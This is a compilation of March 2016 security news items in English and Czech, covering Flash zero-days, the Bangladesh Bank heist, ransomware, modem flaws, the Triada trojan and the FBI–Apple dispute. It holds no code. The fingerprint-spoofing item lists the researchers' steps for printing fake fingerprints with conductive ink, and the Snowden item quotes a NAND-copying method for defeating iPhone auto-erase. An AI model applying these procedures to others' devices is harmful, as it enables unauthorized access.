The Improv project aims to discover new attack vector targeting “easily purchased, relatively benign technologies.”

“The Defense Advanced Research Projects Agency (DARPA) Improv program is soliciting innovative research proposals for prototype products and systems that have the potential to threaten current military operations, equipment, or personnel and are assembled primarily from commercially available technology.” reads the Synopsis of the Improv program.

“Improv will explore ways to combine or convert commercially available products such as off-the-shelf electronics, components created through rapid prototyping, and open-source code to cost-effectively create sophisticated military technologies and capabilities.” explained the program manager John Main.

“To bring a broad range of perspectives to bear, DARPA is inviting engineers, biologists, information technologists and others from the full spectrum of technical disciplines—including credentialed professionals and skilled hobbyists—to show how easily-accessed hardware, software, processes, and methods might be used to create products or systems that could pose a future threat. “

“Improv is being launched in recognition that strategic surprise can also come from more familiar technologies, adapted and applied in novel ways.”

In the first phase of the Improv program, DARPA will accept submissions from the public on possible attack techniques relying on easily-available technologies.

The DARPA will select most interesting projects that will be supported by the agency in various ways, including economic funding.

DARPA Improv program off-the-shelf electronics
“DARPA will assess candidate ideas and offer varying levels of support to develop and test selected proposals. The emphasis will be on speed and economy, with the goal of propelling winning submissions from concept to simple working prototypes within about 90 days.” states the DARPA

The Improv will help the US Military to identify possible attack vectors of potential cyber threats, but many experts believe that the US Government is also thinking about new attack vectors to maintain it supremacy in the cyberspace.

“DARPA often looks at the world from the point of view of our potential adversaries to predict what they might do with available technology,” said Main.

“Historically we did this by pulling together a small group of technical experts, but the easy availability in today’s world of an enormous range of powerful technologies means that any group of experts only covers a small slice of the available possibilities.”

If you are interested in the project follow the special webinar issued by the DARPA on March 29 and 30.


Flash opět obsahuje kritické chyby, podle Adobe je už používají útočníci

12.3.2016 Zranitelnosti

Firma vydala mimořádné opravy více než dvacítky chyb, řada z nich je kritických, takže potenciálním útočníkům umožňují získat vládu nad systémem.
Není to velké překvapení – tím by spíš bylo, kdyby Flash vydržel delší dobu bez zásadních bezpečnostních incidentů. Adobe aktuálně doporučuje aktualizovat Flash Player na nejnovější verzi – pokud tak neučiníte, vystavujete se riziku napadení svého zařízení.

Jednu z chyb už podle firmy útočníci využívají. „Adobe má informace o tom, že chyba CVE-2016–1010 je aktivně zneužívána v omezeném počtu cílených útoků,“ přiznává na svém blogu.

Zatím neupřesněná chyba podle firmy může vést k tomu, že útočník bude schopný na zařízení spouštět svůj kód.

Adobe tak doporučuje updatovat Flash Player na verzi 21.0.0.182 (Windows a Mac), respektive 11.2.202.577 (Linux). Pokud ovšem Flash Player ve svém zařízení nutně nepotřebujete, je nejlepší jej úplně odinstalovat.

Flash je tak jako tak na ústupu. Google nedávno oznámil, že jeho reklamní systémy od léta přestanou přijímat flashové bannery, jeho podporu omezují i prohlížeče a v mobilních zařízeních si beztak ani neškrtne.


How a Typo Stopped Hackers from Stealing $1 Billion from Bank
12.3.2016 Hacking
Typos are really embarrassing, but this time it saved the Bangladesh Central Bank and the New York Federal Reserve by preventing a nearly $1 Billion (£700 Million) heist.
Last month, some unknown hackers broke into Bangladesh's central bank, obtained credentials needed for payment transfers and then transfer large sums to fraudulent accounts based in the Philippines and Sri Lanka. But…
A single spelling mistake in an online bank transfer instruction prevented the full theft, according to Reuters.
Here’s what actually was happened:
Nearly three dozen requests hit the Federal Reserve Bank of New York on 5 February using the Bangladesh Bank's SWIFT code, out of which four resulted in successful transfers, for a total value of about $81 million.
However, when the hackers attempted to make their fifth transfer of $20 Million to a Sri Lankan non-governmental organization called the Shalika Foundation, they made a typo by attempting a transfer to the Shalika "Fandation."
Staff at Deutsche Bank, which was involved in routing funds, spotted this spell error and got asked the Bangladeshis for clarification on the typo. The Bangladesh bank then canceled the remaining transfers.
The Federal Reserve Bank of New York also queried the Bangladesh central bank after spotting the large number of transfer of funds to private accounts at around the same time.
The hackers, who are still unknown, had been attempting to steal a further $850 Million from the Bangladesh government’s reserve account, but typo in the requests prevented the full theft.
The $81 Million of transfer that was successfully made has not been recovered, but the typo saved the Bangladeshis because if all the fund transfers were made successfully thieves would have made off with $950 Million.
The attack happened between February 4 and 5 and originated from outside the country. Moreover, the hackers are still unknown and officials said there is not much hope of catching them.
Meanwhile, the Bangladesh central bank says the Federal Reserve should have stop the transactions. The bank is planning to file a lawsuit against the Federal Reserve in order to recover some of the funds that were lost.


ISPs Sell Your Data to Advertisers, But FCC has a Plan to Protect Privacy
12.3.2016 Hacking
FCC wants ISPs to get customer permission before sharing personal data
The Federal Communication Commission (FCC) has put forward a proposal that aims to protect Internet user's privacy.
The proposal [pdf] will regulate the amount of customers’ online data the Internet Service Providers (ISPs) are able to collect and sell to the advertising companies.
Currently, there is no particular rule by law covering broadband providers and customer privacy, and if adopted, this would be the first privacy rule for ISPs.
The FCC already governs how phone companies can use and resell customer data, and the Chairman Tom Wheeler believes similar rules should be applied to ISPs.
Is Your ISP Tracking Your Web Surfing and Selling Data to Advertisers?
Your complete Internet traffic passes through your Internet Service Provider, which gives it the ability to access to vast and potentially lucrative amount of your web-browsing activity.
If you are using a mobile phone, your ISP can also track your physical location throughout the day in real time.
ISPs are using Deep packet inspection to stealthily gather and store information about their customers’ surfing habits – including:
Search queries
Web sites visited
Information entered
What apps they use
…and then later Advertising companies serve advertisements based on those behaviors.
The proposed set of rules include a requirement that ISPs clearly disclose what data they collect on their users, and share that collected data with other companies for advertisements, marketing or other purposes.
The rules will not prohibit ISPs from using the personal data they collect from their users, "only that since it is your information, you should decide whether they can do so," FCC Chairman Tom Wheeler wrote. "This isn’t about prohibition; it’s about permission."
The proposed rules will be debated during the FCC's March 31 meeting, and if approved would go out for public comment.
The proposal would create some of the strongest privacy regulations and give consumers control over how ISPs can use their data.


SAP Download Manager flaw exposed user password
11.3.2016 Vulnerebility

An attacker who manages to get access to a user’s configuration file for SAP Download Manager might be able to obtain the stored proxy password.
Are you a SAP user? Do you use the SAP Download Manager that allows downloading of software packages and support notes? You urgently need to update it in order to fix a serious vulnerability that could be exploited to expose your password.

According to experts at Core Security, a local attacker who is able to access the user’s configuration file in SAP Download Manager might be able to obtain the stored proxy password.

“SAP Download Manager [1] is a Java application offered by SAP that allows downloading software packages and support notes. This program stores the user’s settings in a configuration file. Sensitive values, such as the proxy username and password if set, are stored encrypted using a fixed static key” states the security advisory published by Core Security.

The flaw affects the SAP Download Manager version up to 2.1.142 (released in October 2015), but experts at Core Security haven’t tested other products and versions.

“SAP system and BASIS administrators often use the SAP Download Manager program to download software packages and fixes. We found that this program stores credentials information on the local user’s directories using an encryption mechanism that can be easily bypassed.” said Core Security Consulting Services’ Martin Gallo who discovered the flaw.

“While recent versions of the program had stopped storing SAP’s Marketplace credentials, proxy authentication information is still kept on the program’s configuration file. This represents a risk on the enterprise environment where proxy authentication is integrated with other systems, for example using Active Directory’s credentials, if the configuration file is compromised,”

It is important to highlight that the SAP application implements encrypted storage of sensitive values, however some sensitive values, such as the user’s proxy password are stored with weak encryption.

SAP published the Security Note 2282338 accessible to its customers only.

The researchers at Core Security also published a proof of concept exploit code that is included in the advisory.

SAP has already fixed the problem and issued a new updated software this week.


Českem se masivně šíří maily s virovou nákazou a šifrující počítač

11.3.2016 Viry
Ransomware Nemucod se distribuuje jako příloha elektronické pošty, jež se nejčastěji označuje jako faktura nebo pozvání k soudu.

Mimořádný nárůst počtu škodlivých e-mailů obsahujících virovou přílohu zaznamenal Eset. Při jejím otevření se podle jeho expertů do zařízení nainstaluje ransomware, což je škodlivý kód, který zašifruje obsah počítače a za jeho odšifrování požaduje výkupné.

Tato virová nákaza – známá jako JS/TrojanDownloader.Nemucod -- se šíří po celém světě, Česká republika je však prý jednou z nejvíce zasažených zemí.

„Virová nákaza se šíří prostřednictvím e-mailových zpráv, které obsahují přílohu ve formátu zip. Ta je nejčastěji označená jako faktura nebo pozvání k soudu. Tímto trikem se útočníci snaží oběť navést k tomu, aby otevřela obsah přílohy. V té se skrývá javascript soubor, který po otevření do počítače nainstaluje škodlivý kód Nemucod, který může do zařízení stáhnout další malware,“ vysvětluje Petr Šnajdr, bezpečnostní expert v Esetu.

„Aktuálně stahuje především různé typy ransomwaru, například známý TeslaCrypt nebo Locky. Následně tento škodlivý kód začne šifrovat obsah počítače a uživateli zobrazí oznámení, že za dešifrování počítače musí zaplatit,“ dodává Šnajdr.

Tento filecoder je nebezpečný tím, že používá kvalitní šifrování podobné nebo totožné s tím, které používají například finanční instituce při zabezpečení on-line plateb.

Ransomware je typ malwaru, který zabraňuje přístupu k osobnímu počítači či mobilnímu zařízení, či k datům zde uloženým. Pro umožnění přístupu je vyžadováno zaplacení výkupného (ransom). Šifrování je zpravidla natolik silné, že jej nelze prolomit.

Ochrana před ransomwarem podle bezpečnostních expertů:

Neotvírejte přílohy zpráv od neznámých adresátů a případně ani ty, které jste vůbec neočekávali.
Varujte kolegy v odděleních, která nejčastěji dostávají e-mailové zprávy z externího prostředí – například personální či finanční oddělení.
Pravidelně zálohujte obsah svého zařízení. I v případě úspěšné infekce se tímto způsobem budete moci dostat k svým datům. Externí disk nebo jiné úložiště však nemohou být neustále připojené k zařízení, jinak bude jejich obsah také zašifrovaný.
Pravidelně aktualizujte operační systém a ostatní programy, které používáte na svém zařízení. Pokud používáte již nepodporovaný operační systém Windows XP, vážně zvažte přechod na novější verzi Windows.
Bezpečnostní software používejte nejen s nejnovějšími aktualizacemi, ale ideálně i jeho nejnovější verzi.


0-day critical flaws in mobile modems allow hackers to take over your PC

11.3.2016 Vulnerebility

The Russian security tester Timur Yunusov has discovered critical flaw affecting routers and 3G and 4G mobile modems from Huawei, ZTE, Gemtek, and Quanta.
The Russian security tester Timur Yunusov has discovered critical vulnerabilities affecting routers and 3G and 4G mobile modems from Huawei, ZTE, Gemtek, and Quanta. The security holes could be exploited by remote attackers to completely compromise machines and intercept HTTP traffic and also SMSs.
Yunusov, a security expert at the Positive Technologies, presented the discovery at the Nullcon conference held in Goa. He discovered the flaws in at least eight different devices. A rapid query on the Shodan search engine allowed him to find more than 42,000 vulnerable devices exposed on the web.

The results include roughly 2800 Gemtek modems and routers and 1250 from Quanta and ZTE.

Shodan result vulnerable routers mobile modems

“All the modem models investigated had critical vulnerabilities leading to complete system compromise,” Yunusov says. “Virtually all the vulnerabilities could be exploited remotely.”

The penetration tester explained that in some cases the vulnerabilities are introduced by the service providers likely to personalize the firmware running on the device. The vulnerabilities are critical because an attacker can remotely trigger them to compromise connected devices, including connected computers.

“Not all the modems had vulnerabilities in their factory settings; some of them appeared after the firmware was customised by the service provider.” he says “If we penetrate a modem … infecting a PC connected to it provides us with many ways to steal and intercept the PC user’s data,”
Almost all devices tested by Yunusov are affected by cross-site request forgery vulnerabilities and lack of input validation, this means that 60 percent of the equipment was exposed to remote code execution.

vulnerable routers modem vulnerability chard mobile modems

The Gemtekm Huawei and Quanta devices resulted vulnerable to firmware modifications, in some cases, the expert noticed that it was possible to upload arbitrary firmware on the units allowing to completely compromise them. Four of the eight modems and routers are affected by cross-site scripting vulnerabilities that could be exploited by a remote attacker to infect the host and intercept SMS for dedicated attackers who want to geo-locate targets.

Timur Yunusov, Kirill Nesterov and their colleagues at Positive Technologies have already conducted a similar study in the past, in October they have found since-patched remote execution and denial of service vulnerabilities in the popular Huawei 4G USB Huawei E3272 modem that can allow hackers to hijack connected computers.

In December, a team of researchers at Positive Technologies conducted a study on how to compromise USB modems and attack SIM cards via SMS over 4G networks.

The team consisting of Sergey Gordeychik, Alexander Zaitsev, Kirill Nesterov, Alexey Osipov, Timur Yunusov, Dmitry Sklyarov, Gleb Gritsai, Dmitry Kurbatov, Sergey Puzankov and Pavel Novikov discovered that 4G USB modems are affected by vulnerabilities that could be exploited by threat actors to gain full control of the machines to which the devices are connected.


Adobe issues emergency out-of-band update for actively exploited 0Day
11.3.2016 Vulnerebility

Adobe has released an emergency out-of-band update to fix a zero-day vulnerability that is being used in targeted attacks.
It’s happened again, Adobe has Issued an emergency Out-of-Band update For Flash Zero-Day that is being exploited in targeted attacks. The unfortunate thing is that the Out-of-Band Patch For Flash Zero-Day comes just a couple of days after releasing the announced updates to fix critical vulnerabilities in Acrobat, Reader and Digital Editions.

The zero-day vulnerability (CVE-2016-1010) addressed by the last Emergency Out-of-Band update has been discovered by threat researcher Anton Ivanov from Kaspersky Lab, ’s vulnerability (CVE-2016-1010) and has been exploited in a limited number of targeted attacks.

CVE-2016-1010 is an integer overflow vulnerability that allows attackers to remotely execute malicious code on vulnerable computers.

“Today Adobe released the security bulletin APSB16-08, crediting Kaspersky Lab for reporting CVE-2016-1010. The vulnerability could potentially allow an attacker to take control of the affected system. Kaspersky Lab researchers observed the usage of this vulnerability in a very limited number of targeted attacks.” states the email sent by a Kaspersky representative to Ars.
“At this time, we do not have any additional details to share on these attacks as the investigation is still ongoing. Even though these attacks are rare, we recommend that everyone get the update from the Adobe site as soon as possible.”

The Emergency Out-of-Band update also fixes also other critical vulnerabilities that could allow an attacker to gain complete control over vulnerable systems.

According to the security bulletin issued by Adobe, the vulnerabilities addressed by the new patch affect all platforms.

“Adobe has released security updates for Adobe Flash Player. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system. Adobe is aware of a report that an exploit for CVE-2016-1010 is being used in limited, targeted attacks.” states the security advisory.

emergency out-of-band update Adobe

The vulnerability details are:

These updates resolve integer overflow vulnerabilities that could lead to code execution (CVE-2016-0963, CVE-2016-0993, CVE-2016-1010).
These updates resolve use-after-free vulnerabilities that could lead to code execution (CVE-2016-0987, CVE-2016-0988, CVE-2016-0990, CVE-2016-0991, CVE-2016-0994, CVE-2016-0995, CVE-2016-0996, CVE-2016-0997, CVE-2016-0998, CVE-2016-0999, CVE-2016-1000).
These updates resolve a heap overflow vulnerability that could lead to code execution (CVE-2016-1001).
These updates resolve memory corruption vulnerabilities that could lead to code execution (CVE-2016-0960, CVE-2016-0961, CVE-2016-0962, CVE-2016-0986, CVE-2016-0989, CVE-2016-0992, CVE-2016-1002, CVE-2016-1005).
In order to reduce the attack surface, uninstall any browser extensions that is not really necessary for your work.


Google Android N Preview — 6 Cool Features That You Should Know
11.3.2016 Mobil
Android N Developer Preview, an early beta of Google’s new mobile operating system that was expected to launch on Google I/O in mid-May, is unexpectedly launching right now.
Android N Developer Preview for the Nexus 6P, Nexus 5X, Nexus 6, Pixel C Nexus 9, the Nexus Player and the General Mobile 4G, an Android One device has been made available as an over-the-air update by Google on Wednesday.
So, you can test out Android N Developer Preview on your smartphone and tablet right now from developer.android.com/preview.
The good news is that the Google Android team has brought meaningful features to your smartphone and tablet in just five months.
"As we look to the next release of Android, N, you’ll notice a few big changes aimed at you as developers: it’s earlier than ever, it’s easier to try and we’re expanding the ways for you to give us feedback," Hiroshi Lockheimer, Google's SVP for Android writes. "We hope these changes will ensure that you are heard and reflected – that’s what makes Android stronger."
Here's what I like about the new Android Developer Preview so far.
1. Multi-Window API
google-android-n-download-1
Multi-window support is the feature users have long asked for – especially on tablets. The feature allows users to perform multiple tasks simultaneously.
So now you can type out a message while viewing a map, check the weather while watching videos, and so on. The screen can be split horizontally or vertically as you prefer.
2. Reply to Messages Directly Without Leaving an App
google-android-n-direct-reply
Among the new changes in Android N are improved notifications. Notifications support "direct reply" feature for app developers who can now allow their users to reply to incoming notifications of WhatsApp, Twitter or SMS messages straight from the notification panel without having to launch the app in question.
Developers can also choose to bundle notification alerts from the same app together, enabling users to see them as a bundle and expand individually if necessary.
3. Better Battery Life
This is the biggest relief for all Android users. With Android Marshmallow, Google introduced a new battery-saving feature called Doze that places an Android device into a deep power-savings mode when it is stationary for a while.
In Android N, Google is taking this feature a step further by allowing Doze to work whenever the screen is OFF, not just when the device is stationary. So your smartphone's battery will now last even longer when it's in standby mode.
4. Data Saver
google-android-n-data-saver
Moreover, Google continues to work on making its Android OS less memory-hungry and making apps running in the background work more efficiently.
When turned ON, the Data Saver feature restricts the apps from using data connection as well as prevent pulling in embedded videos and images on web pages. You can also pick selected apps that may be allowed to use the data connection even when the feature is ON.
However, the Data Saver feature in Android N will be particularly helpful for those who are on prepaid or pay-on-the-go connections for data.
5. Picture-in-Picture Mode
google-android-n-picture-in-picture
Now you can view a YouTube video while reading through a report in Word on your Android device, thanks to Picture-in-picture feature in Android N.
"Picture-in-picture (PIP) mode lets apps run a video activity in the pinned window while another activity continues in the background. The PIP window lets users multitask while using your app, which helps users be more productive." Google describes.
The feature will be more useful for those with tablets or larger phones.
6. No Need to Flash Your Device (Direct Boot)
Yes, the most brilliant part is that you do not need to flash or tether your device to a PC in order to download and install the new Android N Developer Preview, as it can be downloaded straight to your device.
These are the things that are now known to us about the all new Android N Developer Preview, but one thing we definitely don’t know yet that what the ‘N’ will stand for. For me it’s Nutella.
What do you think the "N" will stand for? Hit the comments below and let us know.


Triada Trojan the most sophisticated mobile malware seen to date
11.3.2016 Virus Mobil

Kaspersky Lab recently spotted a new Android malware dubbed Triads Trojan, which they say is the most advanced mobile malware seen to date.
Malware researchers at Kaspersky Lab have discovered a new strain of malware, dubbed Triada (Backdoor.AndroidOS.Triada), targeting Android devices, which they consider the most advanced mobile threat seen to date. The range of techniques used by the threat to compromise mobile devices is not implemented in any other known mobile malware.

Triada was designed with the specific intent to implement financial frauds, typically hijacking the financial SMS transactions. The most interesting characteristic of the Triada Trojan apart is its modular architecture, which gives it theoretically a wide range of abilities.

The Triada Trojan is able to infiltrate all process running on the mobile devices gaining persistence, as explained by researchers Nikita Buchka and Mikhail Kuzin from Kaspersky Lab.

“Considering the aforementioned modular architecture and privileged access to the device, the malware can create literally anything. The capabilities of the uploaded modules are limited only by the imagination and skills of the virus writers. These malicious programs (the app loader and the modules that it downloads) belong to different types of Trojans, but all of them were all included in our antivirus databases under the name Triada.” reads a blog post published by the researchers.

The Android malware is spread through an “advertising botnet” that was used by crooks to spread also other threats, including Leech, Ztorg, and Gorpo and AndroidOS.Iop.

The Triada Trojan makes use of the Zygote parent process to implement its code in the context of all software on the device, this means that the threat is able to run in each application.

“A distinctive feature of the malicious application is the use of the Zygote process to implement its code in the context of all the applications on the device. The Zygote process is the parent process for all Android applications. It contains system libraries and frameworks used by almost all applications. This process is a template for each new application, which means that once the Trojan enters the process, it becomes part of the template and will end up in each application run on the device. This is the first time we have come across this technique in the wild; Zygote was only previously used in proof-of-concepts.”

Triada Trojan

The trojan is hard to detect, it mainly operates in RAM and exploiting root privileges it substitutes system files, it also hides its modules from the list of running/installed services and applications.

Below the list of features for the Triada Trojan.

Modular functionality with active use of superuser privileges
Main part of malicious functionality exists in device RAM only.
Trojan modifies Zygote system process in the memory to achieve persistence.
Industrial approaches used in its development, suggesting its authors are highly qualified.


How to hack mobile phones embedded fingerprint sensor using 2D Printed fingerprints
11.3.2016 Mobil

Two Computer Science researchers developed a technique to hack a phone’s fingerprint sensor in 15 mins with $500 worth of inkjet printer and conductive ink
The Computer Science researchers Kai Cao and Anil K Jain have developed a new technique for hacking a mobile device’s fingerprint sensor in 15 mins with $500 worth of an inkjet printer and conductive ink.

This kind of attacks is very dangerous considering that it has been forecasted that 50% of smartphones sold by 2019 will have an embedded fingerprint sensor.

It is also important to highlight that a growing number of features and applications will rely on fingerprint recognition on mobile devices, for example, secure mobile payment and other transactions.

The duo used a 300dpi scan of a fingerprint to produce a working replica printed of a fingerprint in less than 15 minutes, and the original image could be taken from a fingerprint sensor itself.

The computer experts explained that spoofing attacks still represent a serious problem for embedded fingerprint systems.

“Spoofing refers to the process where the fingerprint image is acquired from a fake finger (or gummy finger) rather than a live finger.” wrote the duo in the paper titled Hacking Mobile Phones Using 2D Printed Fingerprints.

A first proof of concept attack of this kind was presented at Germany’s Chaos Computer Club in 2013 to hack an iPhone 5s, in 2014 the German researcher Jan Krissler, aka Starbug, demonstrated at the same hacking conference how to bypass Fingerprint biometrics using only a few photographs.

The principal limitations of the above techniques are the need to fabricate the spoof manually and the fact that this process is time-consuming.

The method developed by the two researchers overwhelms these limitations, it relies on the sensor embedded in the mobile phone and uses a 2D fingerprint image printed on a special paper. The spoof fingerprint is generated automatically, below the steps of the method developed by the researchers:

Install three AgIC4 silver conductive ink cartridges as well as a normal black ink cartridge in a color inkjet printers (Brother MFC-J5910DW printer was used by us); better conductivity can be achieved if a brand new (unused) printer is used;
Scan the target fingerprint image (of the authorized user) at 300 dpi or higher resolution;
Mirror (reverse the image in the horizontal direction) and print the original or binarized fingerprint image on the glossy side of an AgIC special paper;
spoofing fingerprint sensor

The MSU researchers demonstrated that the attack on fingerprint readers works on various Samsung mobile devices, and less well on some Huawei phones.

“In summary, we have proposed a simple, fast and effective method to generate 2D fingerprint spoofs that can successfully hack built-in fingerprint authentication in mobile phones. Furthermore, hackers can easily generate a large number of spoofs using fingerprint reconstruction [3] or synthesis [4] techniques which is easier than 2.5D fingerprint spoofs.” states the researchers.

“This experiment further confirms the urgent need for antispoofing techniques for fingerprint recognition systems [5], especially for mobile devices which are being increasingly used for unlocking the phone and for payment. It should be noted that not all the mobile phones can be hacked using proposed method. As the phone manufactures develop better anti-spoofing techniques, the proposed method may not work for the new models of mobile phones. However, it is only a matter of time before hackers develop improved hacking strategies not just for fingerprints, but other biometric traits as well that are being adopted for mobile phones (e.g., face, iris and voice).”

The duo confirmed that this is a preliminary study, they will go deep into the analysis of fingerprint sensor.

Below a video PoC of the method developed by the researchers


Chrome i Flash Player obsahují nebezpečné trhliny

10.3.2016 Zranitelnosti
Obezřetní by měli být uživatelé internetu při prohlížení videí i webových stránek. Programy Google Chrome a Adobe Flash Player, které k této činnosti slouží, totiž obsahují nebezpečné trhliny. Záplaty jsou však naštěstí již k dispozici.
Tvůrci webového prohlížeče Chrome už minulý týden vydávali velký balík oprav, který sloužil jako záplata pro více než dvě desítky zranitelností, připomněl server Security Week.

Aktualizace z tohoto týdne opravuje pouze tři trhliny, přesto by s jejich instalací neměli uživatelé zbytečně otálet. Vývojáři totiž jejich důležitost označují jako vysokou. Takovéto chyby zpravidla mohou počítačoví piráti zneužít k propašování škodlivých virů do cizích počítačů.

Chyby jsou obsaženy v Chromu pro Windows, Linux i pro Mac OS X.

Propašovat mohou prakticky libovolný virus
Trhlinám v zabezpečení se nevyhnul ani oblíbený program Flash Player od společnosti Adobe. Ten slouží k přehrávání videí na internetu a na celém světě jej používají milióny lidí. Právě proto se na něj kyberzločinci zaměřují pravidelně a nové aktualizace vycházejí prakticky měsíc co měsíc.

Objevená zranitelnost může vést ke vzdálenému spuštění kódu, tedy k instalaci prakticky jakéhokoliv viru na cizím počítači. Ohroženi jsou přitom majitelé prakticky všech aktuálně dostupných operačních systémů.

Adobe navíc záplatovala tento týden také své další produkty – Acrobat, Reader a Digital Edition.

Chyby jsou i ve Windows a Internet Exploreru
V případě automatických aktualizací se uživatelé Chromu ani programů od Adobe nemusejí o nic starat. Pokud je však tato funkce vypnuta, je nutné navštívit webové stránky tvůrců a nejnovější záplatovanou verzi stáhnout manuálně.

Na pozoru by se měli mít také uživatelé operačního systému Windows a webových prohlížečů Internet Explorer a Edge. Také v nich byly objeveny kritické chyby. Microsoft je tento týden opravil v rámci pravidelných aktualizací, které vycházejí vždy druhé úterý v měsíci.


ISIS – Disclosed thousands of files reporting the identity of 22,000 Jihadis
10.3.2016 Hacking

A former ISIS member has stolen and disclosed thousands of documents reporting the identity of 22,000 Jihadis and other important information.
Thousands of documents reporting the identity of 22,000 Jihadis are handed to Sky News by a former member of the ISIS radical organisation. The documents contain 22,000 names, addresses, telephone numbers and family contacts of ISIS members.

Sky News has obtained a memory stick containing the files that were stolen from the head of Islamic State’s internal security police. The man who stole the memory stick was a former Free Syrian Army convert to Islamic State who calls himself Abu Hamed.

“Disillusioned with the Islamic State leadership, he says it has now been taken over by former soldiers from the Iraqi Baath party of Saddam Hussein.” states SkyNews.

The journalists met him in a secret location in Turkey, the man revealed that the IS was giving up on its headquarters in Raqqa and moving into the central deserts of Syria and ultimately Iraq.

The list of the ISIS members includes militants from more than 51 countries, including the UK. The document is a sort of IS registration form composed of 23 questions that wannabe members had to fill with their personal information.

There are many previously unknown European jihadis in the documents, as well as IS members from the Middle East, North Africa, United States and Canada.

Many names are already known to the Western Intelligence, anyway the presence of the documents online is very important for different reasons. It is essential to understand who really, and how, has obtained the documents.

One of the documents, titled “Martyrs,” includes a list of members ready to carry out suicide attacks, these terrorists have been already trained for such kind of operations.

We cannot exclude that they could be also part of a diversionary strategy of the IS group.

“Abdel Bary, a 26-year-old from London joined in 2013 after visiting Libya, Egypt and Turkey. He is designated as a fighter but is better known in the UK as a rap artist. His whereabouts are unknown. Another jihadi named in the documents, now dead after being targeted in a drone strike, is Junaid Hussain, the head of Islamic State’s media wing who along with his wife former punk Sally Jones, plotted attacks in the UK. Her whereabouts are unknown.” states the post published by SkyNews.

“Reyaad Khan from Cardiff, who also entered in 2013, is also among those found among the registration forms. He was well known for appearing in a highly produced Islamic State propaganda video. He was later killed.”

SkyNews confirmed that many jihadis passed through a series of jihadi “hotspots,” including Yemen, Sudan, Tunisia, Libya, Pakistan and Afghanistan. In any cases, they were able to enter the territory controlled by the IS, join the fights and return home.

The documents are a mine of information for the intelligence, they include many telephone numbers likely belonging to the family members and the jihadis.

The man that disclosed the documents sustains that today the IS has no rules, he doesn’t share the ideology that today is animating the group, so decided to quit the ISIS. He also made another shocking revelation, according to Abu Hamed the ISIS organisation is secretly working with The Kurdish YPG and the Syrian Government to persecute the Syrian opposition.

Also the news portal Zaman Al Wasl (zamanalwsl.net) claimed to have in exclusive 1736 documents revealing ISIS jihadists personal data, it also published it.

“Two thirds of ISIS manpower are from Saudi Arabia, Tunisia, Morocco and Egypt. 25% of ISIS fighters are Saudis, the data disclosed. While Turkish fighters are taking the lead among ISIS foreign fighters, French fighters come next. Syrians are just 1.7 % of the total number of fighters. The Iraqis make 1.2. ” states the Zaman Al Wasl that analyzed the documents it obtained.

ISIS documents


Snowden FBI is lying, it can already unlock iPhone without Apple support
10.3.2016 Apple

Snowden accuses the FBI of lying about his ability to unlock the iphone of the San Bernardino terrorist. “that’s horse sh*t.” he said.
While the dispute between Apple and the FBI on the San Bernardino shooter’s iPhone case continues, the popular NSA whistleblower Edward Snowden takes a position giving us his opinion, and it is not so surprising.

The FBI wants to obtain a court order to force Apple to unlock the terrorist’s iPhone, the authorities have tried to do it, but an error made during the government custody apparently made impossible for the police to access the device. The FBI is demanding that Apple disables the iPhone’s “auto-erase” security feature that wipes the Apple mobile device after 10 failed passcode attempts.
On the other hand, the company of Cupertino is refusing to unlock the device, announcing a legal battle that could reach the Supreme Court.

Snowden in a video call at Blueprint for a Great Democracy conference on Tuesday accuses the FBI of lying defining its declaration defining its claims as absurd, in reality, he used a more colorful expression.

“The FBI says Apple has the ‘exclusive technical means’ to unlock the phone,” said Snowden in video conference “Respectfully, that’s horse sh*t.”
Snowden opinion on Apple vs FBI case

On the same day, Snowden shared via Twitter a link to an American Civil Liberties Union blog post titled “One of the FBI’s Major Claims in the iPhone Case Is Fraudulent,” which explains that the FBI has the ability to bypass iPhone protection mechanism.

“But the truth is that even if this feature is enabled on the device in question, the FBI doesn’t need to worry about it, because they can already bypass it by backing up part of the phone (called the “Effaceable Storage”) before attempting to guess the passcode. I’ll go into the technical details (which the FBI surely already knows) below.” states the post.

The post explains that FBI can simply make a copy of the content of the Effaceable Storage while trying to guess the passcode.

“So the file system key (which the FBI claims it is scared will be destroyed by the phone’s auto-erase security protection) is stored in the Effaceable Storage on the iPhone in the “NAND” flash memory. All the FBI needs to do to avoid any irreversible auto erase is simple to copy that flash memory (which includes the Effaceable Storage) before it tries 10 passcode attempts. It can then re-try indefinitely, because it can restore the NAND flash memory from its backup copy.” continues the post.

“The FBI can simply remove this chip from the circuit board (“desolder” it), connect it to a device capable of reading and writing NAND flash, and copy all of its data. It can then replace the chip, and start testing passcodes. If it turns out that the auto-erase feature is on, and the Effaceable Storage gets erased, they can remove the chip, copy the original information back in, and replace it. If they plan to do this many times, they can attach a “test socket” to the circuit board that makes it easy and fast to do this kind of chip swapping.”

Snowden opinion on Apple vs FBI case - internal iPhone

Image credit: http://www.mobpart.com/iphone-5c-c-61_63

Snowden expressed his solidarity to IT giants that are working to provide new solutions, and improve the existing ones, to protect the users’ privacy through the implementation of strong encryption.

“We should support vendors who are willing to [say], ‘You know, just because it’s popular to collect everybody’s information and resell it to advertisers and whatever, it’s going to serve our reputation, it’s going to serve our relationship with our customers, and it’s going to serve society better. If instead we just align ourselves with our customers and what they really want, if we can outcompete people on the value of our products without needing to subsidize that by information that we’ve basically stolen from our customers’,” he told TechCrunch in June, months before the December massacre in San Bernardino. “That’s absolutely something that should be supported.”


Bangladesh says hackers stole $100 Million from its US Federal Reserve account

10.3.2016 Incindent

Unknown hackers have stolen more than $100 million from the Bangladesh Bank account at the US Federal Reserve Bank.
According to Bloomberg, the Bangladesh’s Finance Minister Abul Maal Abdul Muhith is accusing the U.S. Federal Reserve for the theft of at least $100 million stolen from the Bangladesh’s account. Bangladesh is threatening the US for a legal fight to retrieve the funds, explained Muhith in a press conference held in Dhaka on Tuesday. The central bank of Bangladesh declared the funds had been stolen from an account by hackers, the experts had traced some of the missing funds in the Philippines.

“We kept money with the Federal Reserve Bank and irregularities must be with the people who handle the funds there,” Muhith said. “It can’t be that they don’t have any responsibility.”

While the central bank of Bangladesh is blaming Chinese hackers, the Federal Reserve is denying the security breach of security took place.

On Monday, a spokeswoman for the US Federal Reserve Bank of New York confirmed there was no evidence of a security breach, neither that the Bangladesh Bank account had been hacked.

Federal reserve bank hacking

The Fed spokeswoman clarified that every payment follows standard protocols and is authenticated by the SWIFT message system used by financial institutions

“To date, there is no evidence of any attempt to penetrate Federal Reserve systems in connection with the payments in question, and there is no evidence that any Fed systems were compromised,” said New York Fed spokeswoman Andrea Priest.

Currently, the US Fed and the Bangladesh Government are investigating the incident.

